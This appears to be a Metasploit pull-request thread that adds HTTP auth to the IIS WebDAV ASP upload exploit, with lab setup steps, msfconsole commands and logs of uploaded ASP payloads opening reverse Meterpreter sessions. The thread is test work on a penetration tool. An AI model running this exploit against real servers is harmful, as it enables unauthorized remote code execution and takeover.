Fix #4115 - iis_webdav_upload_asp.rb should support http auth

[wchen-r7]

HTTP auth is already implemented in Rex so there is really no point to say it can't do it. I also changed the error/warning messages to be more informative about why the module fails.

Setup for verification

• Windows XP SP3
• IIS 5.1. If you don't have this, you can install it from the Windows Components Wizard.
• For testing purposes, make sure no firewall
• After the IIS installation, create a folder in C:\Inetpub\wwwroot\upload
• Add a new user "Everyone" to the "upload" folder, and grant "Full Control" to it. You need this setting for Verification 1. But Integrated Windows authentication doesn't need this setting.
• Make sure you know the password for the default Windows user (which I think is Administrator). Set one if it's blank: net user Administrator [password] in command prompt.
• Go to Administrative Tools -> Internet Information Services.
• Right click on the 'upload' folder, go to Properties
• Check Script source access
• Check Read
• Check Write

Verification 1: Test without auth

• Start msfconsole
• use exploits/windows/iis/iis_webdav_upload_asp
• set rhost [IP]
• set path /upload/test.asp
• run
• You should get a session
• When you're done with this test, make sure to remove C:\Inetpub\wwwroot\upload\test.asp for the next test.

Verification 2: Test with Windows authentication

In order to test authentication, you need to Administrative Tools -> Internet Information Services and configure a few things:

• Right click on the 'upload' folder, go to Properties
• Click on the 'Directory Security' tab
• Click on 'Edit' under 'Anonymous access and authentication control'
• Uncheck 'Anonymous access'
• Check 'Integrated Windows authentication'

Ok, then you're ready to test:

• Start msfconsole
• use exploits/windows/iis/iis_webdav_upload_asp
• set rhost [IP]
• set path /upload/test.asp
• set username [valid username]
• set password [valid password]
• run
• You should get a session

If you want, you can also test with a bad username/password too. In that case, you should see "401 Access Denied" when the module tries to upload the ASP file.

• When you're done with this test, make sure to remove C:\Inetpub\wwwroot\upload\test.asp for the next test.

Verification 3: Script source access permission

Before you test this, make sure that:

• You are still using the same auth instructed from Verification 2
• Back to your IIS manager, right click on the 'upload' folder -> Properties
• Make sure the "Script source access" is unchecked.
• This time, your exploit will fail, and you should see this message: "The MOVE verb failed to rename the file. Possibly IIS doesn't allow 'Script Resource Access'."

Verification 4: Read permission

• Still the same auth from Verification 2
• This time, make sure 'Read' is unchecked. (but the other two such as "Script source access" and "write" should be checked)
• Run the exploit, and you should see: "IIS possibly does not allow 'Read' permission"

Verification 5: Write permission

• Still the same auth from Verification 2
• This time, make sure 'Write' is unchecked. (but the other two such as "Script source access" and "read" should be checked)
• Run the exploit, and you should see: "It's possible either you set the PATH option wrong, or IIS doesn't allow Write permission"

[jvazquez-r7]

• Test without auth:

msf exploit(iis_webdav_upload_asp) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 613830 bytes to /upload/test.txt...
[*] Moving /upload/test.txt to /upload/test.asp...
[*] Executing /upload/test.asp...
[*] Sending stage (770048 bytes) to 172.16.158.131
[*] Deleting /upload/test.asp, this doesn't always work...
[!] Deletion failed on /upload/test.asp [403 Forbidden]

meterpreter > getuid
Server username: JUAN-C0DE875735\IWAM_JUAN-C0DE875735
meterpreter >

[jvazquez-r7]

• Test 2 Test with Windows authentication
• correct credentials

msf exploit(iis_webdav_upload_asp) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 613909 bytes to /upload/auth.txt...
[*] Moving /upload/auth.txt to /upload/auth.asp...
[*] Executing /upload/auth.asp...
[*] Sending stage (770048 bytes) to 172.16.158.131
[*] Deleting /upload/auth.asp, this doesn't always work...
[!] Deletion failed on /upload/auth.asp [403 Forbidden]

meterpreter > exit
[*] Shutting down Meterpreter...

• Incorrect credentials

msf exploit(iis_webdav_upload_asp) > set PASSWORD admin2
PASSWORD => admin2
msf exploit(iis_webdav_upload_asp) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 613959 bytes to /upload/auth.txt...
[-] Upload failed on /upload/auth.txt [401 Access Denied]

[jvazquez-r7]

• Test 3

msf exploit(iis_webdav_upload_asp) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 612527 bytes to /upload/auth.txt...
[*] Moving /upload/auth.txt to /upload/auth.asp...
[*] Executing /upload/auth.asp...
[-] Execution failed on /upload/auth.asp [404 Object Not Found]
[-] The MOVE verb failed to rename the file. Possibly IIS doesn't allow 'Script Resource Access'.

[jvazquez-r7]

• Test 4:

msf exploit(iis_webdav_upload_asp) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 609617 bytes to /upload/auth.txt...
[*] Moving /upload/auth.txt to /upload/auth.asp...
[-] Move failed on /upload/auth.txt [403 Forbidden]
[-] IIS possibly does not allow 'Read' permission, which is required to upload executable content.

[jvazquez-r7]

On the write permissions tests I read:

msf exploit(iis_webdav_upload_asp) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 609292 bytes to /upload/auth.txt...
[-] Upload failed on /upload/auth.txt [403 Forbidden]

But all the results make sense for me, so landing!

[wchen-r7]

Looks good.

[wchen-r7]

Thanks @jvazquez-r7